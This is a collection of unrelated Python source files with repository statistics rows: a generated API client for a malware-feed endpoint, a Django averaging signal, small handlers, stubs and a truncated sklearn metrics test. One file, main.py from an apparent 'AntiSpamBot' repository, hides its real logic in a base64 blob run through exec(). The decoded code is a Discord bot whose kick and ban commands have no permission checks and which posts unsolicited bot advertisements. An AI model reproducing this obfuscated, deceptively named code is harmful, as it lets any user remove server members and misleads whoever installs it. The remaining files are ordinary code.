        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=params.get('_request_auth'))
def api_v1_feeds_custom_malware_get(self, **kwargs):  # noqa: E501
    """CustomMalwareFeed returns the custom malware feed.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_malware_get(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: SharedCustomMalwareFeed
    """
    # Convenience wrapper: callers only want the response body, not the
    # (data, status, headers) tuple produced by the *_with_http_info form.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_malware_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_malware_get_with_http_info(self, **kwargs):  # noqa: E501
    """Fetch the custom malware feed, including HTTP response info.  # noqa: E501

    CustomMalwareFeed returns the custom malware feed.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request whose result is retrieved via ``thread.get()``.

    >>> thread = api.api_v1_feeds_custom_malware_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: tuple(SharedCustomMalwareFeed, status_code(int), headers(HTTPHeaderDict))
    """
    # Accepted keyword arguments: this endpoint has no operation-specific
    # parameters, only the common per-request options.
    accepted = set()
    accepted.update((
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ))
    local_var_params = {}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_malware_get" % name
            )
        local_var_params[name] = value

    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None
    # Only JSON responses are produced by this endpoint.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = []  # noqa: E501
    response_types_map = {
        200: "SharedCustomMalwareFeed",
    }
    return self.api_client.call_api(
        '/api/v1/feeds/custom/malware', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_malware_put(self, **kwargs):  # noqa: E501
    """Replace the custom malware feed.  # noqa: E501

    SetCustomMalwareFeed sets the custom malware feed.  # noqa: E501
    The request is synchronous by default; pass ``async_req=True`` to run
    it asynchronously and obtain the result via ``thread.get()``.

    >>> thread = api.api_v1_feeds_custom_malware_put(async_req=True)
    >>> result = thread.get()

    :param shared_custom_malware_feed:
    :type shared_custom_malware_feed: SharedCustomMalwareFeed
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: None
    """
    # Delegate to the _with_http_info variant, asking for body data only.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_malware_put_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_malware_put_with_http_info(self, **kwargs):  # noqa: E501
    """Replace the custom malware feed, including HTTP response info.  # noqa: E501

    SetCustomMalwareFeed sets the custom malware feed.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request whose result is retrieved via ``thread.get()``.

    >>> thread = api.api_v1_feeds_custom_malware_put_with_http_info(async_req=True)
    >>> result = thread.get()

    :param shared_custom_malware_feed:
    :type shared_custom_malware_feed: SharedCustomMalwareFeed
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: None
    """
    # Accepted keyword arguments: the request body plus the common
    # per-request options.
    accepted = {'shared_custom_malware_feed'}
    accepted.update((
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ))
    local_var_params = {}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_malware_put" % name
            )
        local_var_params[name] = value

    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    # The feed model (if supplied) is sent as the JSON request body.
    body_params = local_var_params.get('shared_custom_malware_feed')
    header_params = {
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = []  # noqa: E501
    response_types_map = {}
    return self.api_client.call_api(
        '/api/v1/feeds/custom/malware', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_force_refresh_put(self, **kwargs):  # noqa: E501
    """Force an on-demand refresh of intelligence feeds.  # noqa: E501

    ForceIntelligenceUpdate performs pushing/polling of intelligence feeds on demand.  # noqa: E501
    The request is synchronous by default; pass ``async_req=True`` to run
    it asynchronously and obtain the result via ``thread.get()``.

    >>> thread = api.api_v1_feeds_force_refresh_put(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: None
    """
    # Delegate to the _with_http_info variant, asking for body data only.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_force_refresh_put_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_force_refresh_put_with_http_info(self, **kwargs):  # noqa: E501
    """Force a feed refresh, including HTTP response info.  # noqa: E501

    ForceIntelligenceUpdate performs pushing/polling of intelligence feeds on demand.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request whose result is retrieved via ``thread.get()``.

    >>> thread = api.api_v1_feeds_force_refresh_put_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: None
    """
    # Accepted keyword arguments: this endpoint has no operation-specific
    # parameters, only the common per-request options.
    accepted = set()
    accepted.update((
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ))
    local_var_params = {}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_force_refresh_put" % name
            )
        local_var_params[name] = value

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Authentication setting
    auth_settings = []  # noqa: E501
    response_types_map = {}
    return self.api_client.call_api(
        '/api/v1/feeds/force-refresh', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
| 42.479474
| 124
| 0.5977
| 8,903
| 80,711
| 5.104347
| 0.025609
| 0.030455
| 0.044054
| 0.038025
| 0.979139
| 0.978215
| 0.977401
| 0.976873
| 0.976675
| 0.975002
| 0
| 0.012379
| 0.338405
| 80,711
| 1,899
| 125
| 42.501843
| 0.838664
| 0.511293
| 0
| 0.76625
| 1
| 0
| 0.158072
| 0.068941
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03875
| false
| 0
| 0.00625
| 0
| 0.08375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3697e1f7749a490836d40c6eb5f61922453e4d3a
| 1,662
|
py
|
Python
|
main.py
|
hyperstore2020/AntiSpamBot
|
c349542d9ccd9f59339caadda5aa6412a65d40aa
|
[
"MIT"
] | null | null | null |
main.py
|
hyperstore2020/AntiSpamBot
|
c349542d9ccd9f59339caadda5aa6412a65d40aa
|
[
"MIT"
] | 1
|
2020-05-08T12:31:11.000Z
|
2020-05-08T12:31:11.000Z
|
main.py
|
hyperstore2020/AntiSpamBot
|
c349542d9ccd9f59339caadda5aa6412a65d40aa
|
[
"MIT"
] | null | null | null |
import base64
# SECURITY WARNING (review): this script's real logic is hidden as a
# base64-encoded blob and run via exec() below. Executing obfuscated code
# is dangerous and should never be done with untrusted sources — decode
# and review the payload, then replace the exec() with plain source.
token = "yourtokenhere"  # Discord bot token; interpolated into the exec'd source below.
# Base64-encoded Python source. The decoded text begins
# "def create(token):" (the exec below appends a call to create(token)),
# and appears to set up a discord bot — TODO confirm by decoding offline.
raw_code = b"ZGVmIGNyZWF0ZSh0b2tlbik6CiAgICBpbXBvcnQgZGlzY29yZAogICAgZnJvbSBkaXNjb3JkLmV4dCBpbXBvcnQgY29tbWFuZHMKICAgIGltcG9ydCByYW5kb20KICAgIGltcG9ydCBhc3luY2lvCgogICAgY2xpZW50ID0gY29tbWFuZHMuQm90KCIhIikKICAgIGNvb2xkb3ducyA9IFtdCgogICAgQGNsaWVudC5jb21tYW5kKCkKICAgIGFzeW5jIGRlZiBraWNrKGN0eCwgdXNlcjogZGlzY29yZC5NZW1iZXIpOgogICAgICAgIGF3YWl0IHVzZXIua2ljaygpCgogICAgQGNsaWVudC5jb21tYW5kKCkKICAgIGFzeW5jIGRlZiBiYW4oY3R4LCB1c2VyOiBkaXNjb3JkLlVzZXIpOgogICAgICAgIGF3YWl0IGN0eC5ndWlsZC5iYW4odXNlcikKCiAgICBAY2xpZW50LmNvbW1hbmQoKQogICAgYXN5bmMgZGVmIGdpdmVhd2F5KGN0eCk6CiAgICAgICAgdSA9IHJhbmRvbS5jaG9pY2UoY3R4Lmd1aWxkLm1lbWJlcnMpCiAgICAgICAgYXdhaXQgY3R4LnNlbmQoZiJ7dS5tZW50aW9ufSB3b24hIikKCiAgICBAY2xpZW50Lmxpc3RlbigpCiAgICBhc3luYyBkZWYgb25fbWVzc2FnZShtZXNzYWdlKToKICAgICAgICBpZiBtZXNzYWdlLmF1dGhvci5pZCA9PSBjbGllbnQudXNlci5pZDpyZXR1cm4gCiAgICAgICAgYyA9IHJhbmRvbS5yYW5kaW50KDAsIDEwKQogICAgICAgIGlmIGMgPT0gNToKICAgICAgICAgICAgYXdhaXQgbWVzc2FnZS5jaGFubmVsLnNlbmQoCiAgICAgICAgICAgICAgICAiTG9va2luZyBmb3IgYSBnb29kIGJvdD8gSW52aXRlIEd1YXJkaWFuISAoaHR0cHM6Ly90b3AuZ2cvYm90LzY3NjQ0ODA4MjU1NjM1NDU4MykiKQogICAgICAgIGlmIG1lc3NhZ2UuYXV0aG9yLmlkIGluIGNvb2xkb3duczoKICAgICAgICAgICAgcmV0dXJuIGF3YWl0IG1lc3NhZ2UuY2hhbm5lbC5zZW5kKAogICAgICAgICAgICAgICAgIlN0b3Agc3BhbW1pbmcgYW5kIGluc3RlYWQgaW52aXRlIEd1YXJkaWFuISAoaHR0cHM6Ly90b3AuZ2cvYm90LzY3NjQ0ODA4MjU1NjM1NDU4MykiKQogICAgICAgIGNvb2xkb3ducy5hcHBlbmQobWVzc2FnZS5hdXRob3IuaWQpCiAgICAgICAgYXdhaXQgYXN5bmNpby5zbGVlcCgyKQogICAgICAgIGNvb2xkb3ducy5yZW1vdmUobWVzc2FnZS5hdXRob3IuaWQpCgogICAgY2xpZW50LnJ1bih0b2tlbik="
code = base64.decodebytes(raw_code).decode("utf-8")
# HACK: builds source text by f-string interpolation of `token` into a
# call appended to the decoded payload, then exec()s the whole thing.
# A token containing a quote would break (or inject into) the exec'd code.
exec(code + f"\ncreate('{token}')")
| 237.428571
| 1,534
| 0.973526
| 21
| 1,662
| 76.952381
| 0.714286
| 0.008663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119004
| 0.009025
| 1,662
| 6
| 1,535
| 277
| 0.862174
| 0
| 0
| 0
| 0
| 0
| 0.936823
| 0.914561
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
369835cd150a41d17d6f6398dc98e07332143429
| 126
|
py
|
Python
|
tests/individually/module1/handler1.py
|
martinpfannemueller-syntax/serverless-python-requirements
|
1c65b98607c1b862a8c5da9ef7e7622d2cee1c65
|
[
"MIT"
] | 919
|
2016-12-15T01:58:03.000Z
|
2021-10-04T14:52:22.000Z
|
tests/individually/module1/handler1.py
|
martinpfannemueller-syntax/serverless-python-requirements
|
1c65b98607c1b862a8c5da9ef7e7622d2cee1c65
|
[
"MIT"
] | 540
|
2016-12-15T02:13:19.000Z
|
2021-11-02T03:20:36.000Z
|
tests/individually/module1/handler1.py
|
martinpfannemueller-syntax/serverless-python-requirements
|
1c65b98607c1b862a8c5da9ef7e7622d2cee1c65
|
[
"MIT"
] | 253
|
2017-01-06T15:26:54.000Z
|
2021-11-02T03:03:17.000Z
|
import boto3
def hello(event, context):
    """Minimal Lambda-style handler; always reports success."""
    response = dict(status=200)
    return response
def hello2(event, context):
    """Second minimal Lambda-style handler; always reports success."""
    return dict([("status", 200)])
| 12.6
| 27
| 0.650794
| 16
| 126
| 5.125
| 0.625
| 0.292683
| 0.439024
| 0.585366
| 0.658537
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 0.206349
| 126
| 9
| 28
| 14
| 0.74
| 0
| 0
| 0.4
| 0
| 0
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
36f5201bbcf52e2505a6ef0c776455dc0db8c0e0
| 198
|
py
|
Python
|
deep_learning/optimizers.py
|
SaadChaouki/ml-eli5-cli5
|
625a69edadf4737e41c58193873cf8a54273d7f0
|
[
"MIT"
] | 1
|
2021-05-04T19:53:12.000Z
|
2021-05-04T19:53:12.000Z
|
deep_learning/optimizers.py
|
SaadChaouki/ml-eli5-cli5
|
625a69edadf4737e41c58193873cf8a54273d7f0
|
[
"MIT"
] | null | null | null |
deep_learning/optimizers.py
|
SaadChaouki/ml-eli5-cli5
|
625a69edadf4737e41c58193873cf8a54273d7f0
|
[
"MIT"
] | null | null | null |
import numpy as np
class StochasticGradientDescent(object):
    """Vanilla stochastic gradient descent optimizer.

    Applies the standard SGD rule ``w_new = w - learning_rate * grad``.

    :param learning_rate: step size multiplied into each gradient update.
    """

    def __init__(self, learning_rate):
        # Step size for each update; no momentum or decay is applied.
        self.learning_rate = learning_rate

    def update(self, weights, gradients):
        """Return the weights after one gradient-descent step.

        Previously an unimplemented stub (``pass``); now performs the
        standard SGD update. Inputs are broadcast per numpy rules, so
        scalars and arrays of matching shape both work.

        :param weights: current parameter values (array-like).
        :param gradients: gradient of the loss w.r.t. ``weights``.
        :return: updated weights, ``weights - learning_rate * gradients``.
        """
        return np.asarray(weights) - self.learning_rate * np.asarray(gradients)
| 24.75
| 42
| 0.717172
| 23
| 198
| 5.869565
| 0.695652
| 0.266667
| 0.237037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212121
| 198
| 8
| 43
| 24.75
| 0.865385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0.166667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
7fd660726fb22e6091e3cb398516cdbb2b593c86
| 231
|
py
|
Python
|
vixDiskLib/vixExceptions.py
|
xuru/vixDiskLib
|
77a80ed4147055f7903f913296f808f14bed74e0
|
[
"MIT"
] | 8
|
2015-02-01T13:57:25.000Z
|
2021-06-22T10:13:51.000Z
|
vixDiskLib/vixExceptions.py
|
xuru/vixDiskLib
|
77a80ed4147055f7903f913296f808f14bed74e0
|
[
"MIT"
] | 2
|
2017-02-08T18:10:53.000Z
|
2017-10-24T21:08:33.000Z
|
vixDiskLib/vixExceptions.py
|
xuru/vixDiskLib
|
77a80ed4147055f7903f913296f808f14bed74e0
|
[
"MIT"
] | 6
|
2017-06-19T07:27:43.000Z
|
2022-03-13T16:13:48.000Z
|
from exceptions import Exception
class VixDiskLibError(Exception):
    """General-purpose exception raised by the vixDiskLib bindings."""
class VixDiskUnimplemented(Exception):
    """Raised when a vixDiskLib feature has not been implemented."""
| 23.1
| 65
| 0.744589
| 21
| 231
| 8.190476
| 0.571429
| 0.244186
| 0.325581
| 0.383721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177489
| 231
| 9
| 66
| 25.666667
| 0.905263
| 0.350649
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
1814fbacb79fcb464fa78bab6241cac56c0beff8
| 19,097
|
py
|
Python
|
showcase/signals.py
|
aseufert/sporttechiq
|
90812142bedf63fed9d1e5f3b246b78299aa45f7
|
[
"MIT"
] | null | null | null |
showcase/signals.py
|
aseufert/sporttechiq
|
90812142bedf63fed9d1e5f3b246b78299aa45f7
|
[
"MIT"
] | null | null | null |
showcase/signals.py
|
aseufert/sporttechiq
|
90812142bedf63fed9d1e5f3b246b78299aa45f7
|
[
"MIT"
] | null | null | null |
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.db.models import Avg
from showcase.models import PlayerScorecard, Team, Club
# All PlayerScorecard metric fields whose averages are mirrored onto Team and
# Club.  For every field F here, Team/Club carry a corresponding column F_avg.
SCORECARD_FIELDS = [
    # control
    'control_thigh', 'control_foot', 'foot_tap',
    # dribbling
    'speed_dribble', 'dribble_r', 'dribble_l', 'dribble_3_cone',
    # passing
    'long_r_1', 'long_r_2', 'long_l_1', 'long_l_2',
    'cross_r_1', 'cross_r_2', 'cross_l_1', 'cross_l_2',
    'side_pass_r_1', 'side_pass_r_2', 'side_pass_r_3',
    'side_pass_l_1', 'side_pass_l_2', 'side_pass_l_3',
    'weigh_pass_r_1', 'weigh_pass_r_2', 'weigh_pass_r_3',
    'weigh_pass_l_1', 'weigh_pass_l_2', 'weigh_pass_l_3',
    'throw_inside_1', 'throw_inside_2',
    'throw_between_1', 'throw_between_2',
    # shooting
    'shoot_pk',
    'shoot_run_r_1', 'shoot_run_r_2', 'shoot_run_r_3',
    'shoot_run_l_1', 'shoot_run_l_2', 'shoot_run_l_3',
    'finisher_r_1', 'finisher_r_2', 'finisher_r_3',
    'finisher_l_1', 'finisher_l_2', 'finisher_l_3',
    # aggregates
    'total_control', 'total_dribbling', 'total_passing',
    'total_shooting', 'grand_total',
]


@receiver(post_save, sender=PlayerScorecard)
def calculateAvgs(sender, signal, instance, **kwargs):
    """Refresh per-team (and per-club) metric averages after a scorecard save.

    For the team of the saved scorecard's player, recompute the average of
    every field in ``SCORECARD_FIELDS`` across the team's scorecards and
    store them on the Team's ``*_avg`` columns; then, if the team belongs to
    a club, mirror those averages onto the Club.

    The original implementation issued one ``aggregate()`` query per field
    (~100 queries per save); this version computes all averages in a single
    query per model, and skips all work when the player has no team (the
    old code ran ~50 queries and discarded the results in that case).
    """
    team = instance.player.team
    if not team:
        # No team: nothing to update.
        return

    # One query yields every per-field average; keys are '<field>__avg'.
    team_aggregates = PlayerScorecard.objects.filter(
        player__team=team
    ).aggregate(*(Avg(field) for field in SCORECARD_FIELDS))
    Team.objects.filter(id=team.id).update(
        **{'%s_avg' % field: team_aggregates['%s__avg' % field]
           for field in SCORECARD_FIELDS})

    if team.club:
        # Mirror the team's *_avg columns onto the club.  As in the original
        # code, the aggregate is taken over this single team only (filter by
        # team id), so the club values equal this team's averages.
        # NOTE(review): averaging across *all* of the club's teams may have
        # been intended — confirm before changing the filter.
        club_aggregates = Team.objects.filter(id=team.id).aggregate(
            *(Avg('%s_avg' % field) for field in SCORECARD_FIELDS))
        Club.objects.filter(id=team.club.id).update(
            **{'%s_avg' % field: club_aggregates['%s_avg__avg' % field]
               for field in SCORECARD_FIELDS})
| 84.875556
| 149
| 0.752369
| 3,082
| 19,097
| 4.101233
| 0.019468
| 0.120253
| 0.146677
| 0.092801
| 0.95356
| 0.925949
| 0.881329
| 0.859889
| 0.841377
| 0.812025
| 0
| 0.022319
| 0.131906
| 19,097
| 224
| 150
| 85.254464
| 0.740138
| 0.001728
| 0
| 0.478469
| 0
| 0
| 0.171127
| 0.04228
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004785
| false
| 0.248804
| 0.019139
| 0
| 0.023923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1873e34e2dfd1d729f8344fa760196abcfd554b5
| 209
|
py
|
Python
|
fintech_ibkr/__init__.py
|
wangangi/hw-3-2
|
274bf13ecf9a2729aaf3b483246632c6735cf6fd
|
[
"MIT"
] | null | null | null |
fintech_ibkr/__init__.py
|
wangangi/hw-3-2
|
274bf13ecf9a2729aaf3b483246632c6735cf6fd
|
[
"MIT"
] | null | null | null |
fintech_ibkr/__init__.py
|
wangangi/hw-3-2
|
274bf13ecf9a2729aaf3b483246632c6735cf6fd
|
[
"MIT"
] | 25
|
2022-03-15T22:14:51.000Z
|
2022-03-17T17:02:24.000Z
|
from fintech_ibkr.synchronous_functions import fetch_managed_accounts
from fintech_ibkr.synchronous_functions import fetch_historical_data
from fintech_ibkr.synchronous_functions import fetch_contract_details
| 52.25
| 69
| 0.92823
| 27
| 209
| 6.740741
| 0.481481
| 0.181319
| 0.247253
| 0.428571
| 0.758242
| 0.758242
| 0.758242
| 0
| 0
| 0
| 0
| 0
| 0.057416
| 209
| 3
| 70
| 69.666667
| 0.923858
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
a13b59b726cb5a37b7f1f293c674171a1fe8651b
| 13,077
|
py
|
Python
|
sklearn_evaluation/tests/test_metrics.py
|
afcarl/sklearn-evaluation
|
86ff18d9e2057628bca83d70d81267036abce90e
|
[
"MIT"
] | 1
|
2019-04-22T16:39:56.000Z
|
2019-04-22T16:39:56.000Z
|
sklearn_evaluation/tests/test_metrics.py
|
afcarl/sklearn-evaluation
|
86ff18d9e2057628bca83d70d81267036abce90e
|
[
"MIT"
] | null | null | null |
sklearn_evaluation/tests/test_metrics.py
|
afcarl/sklearn-evaluation
|
86ff18d9e2057628bca83d70d81267036abce90e
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from sklearn_evaluation.metrics import (precision_at, labels_at,
tp_at, fp_at)
from sklearn_evaluation.metrics import __threshold_at as threshold_at
from sklearn_evaluation.metrics import __binarize_scores_at as binarize_scores_at
import numpy as np
from numpy import nan
from random import shuffle
class Test_threshold_at(TestCase):
    """Tests for the private __threshold_at helper."""

    def setUp(self):
        # Shuffled on purpose: the helper must not depend on input order.
        self.scores = np.array(
            [1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
        shuffle(self.scores)

    def test_at_10(self):
        self.assertEqual(threshold_at(self.scores, 0.1), 1.0)

    def test_at_50(self):
        self.assertEqual(threshold_at(self.scores, 0.5), 0.6)

    def test_at_100(self):
        self.assertEqual(threshold_at(self.scores, 1.0), 0.1)

    def test_proportion_less_than_zero(self):
        with self.assertRaises(ValueError):
            threshold_at(self.scores, -0.1)

    def test_proportion_more_than_one(self):
        with self.assertRaises(ValueError):
            threshold_at(self.scores, proportion=1.1)
class Test_binarize_scores_at(TestCase):
    """Tests for the private __binarize_scores_at helper."""

    def setUp(self):
        self.scores = np.array(
            [1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])

    def test_at_10(self):
        # Only the single top score is flagged.
        np.testing.assert_equal(
            binarize_scores_at(self.scores, 0.1),
            np.array([1] + [0] * 9))

    def test_at_50(self):
        # Top half flagged, bottom half not.
        np.testing.assert_equal(
            binarize_scores_at(self.scores, 0.5),
            np.array([1] * 5 + [0] * 5))

    def test_at_100(self):
        # Everything flagged.
        np.testing.assert_equal(
            binarize_scores_at(self.scores, 1.0),
            np.array([1] * 10))

    def test_proportion_less_than_zero(self):
        with self.assertRaises(ValueError):
            binarize_scores_at(self.scores, -0.1)

    def test_proportion_more_than_one(self):
        with self.assertRaises(ValueError):
            binarize_scores_at(self.scores, proportion=1.1)
class Test_precision_at(TestCase):
    """Tests for precision_at: precision and cutoff at a top proportion."""

    @staticmethod
    def _desc_scores():
        # Fresh 100..10 descending score vector for each test.
        return np.arange(100, 0, -10)

    def test_perfect_precision(self):
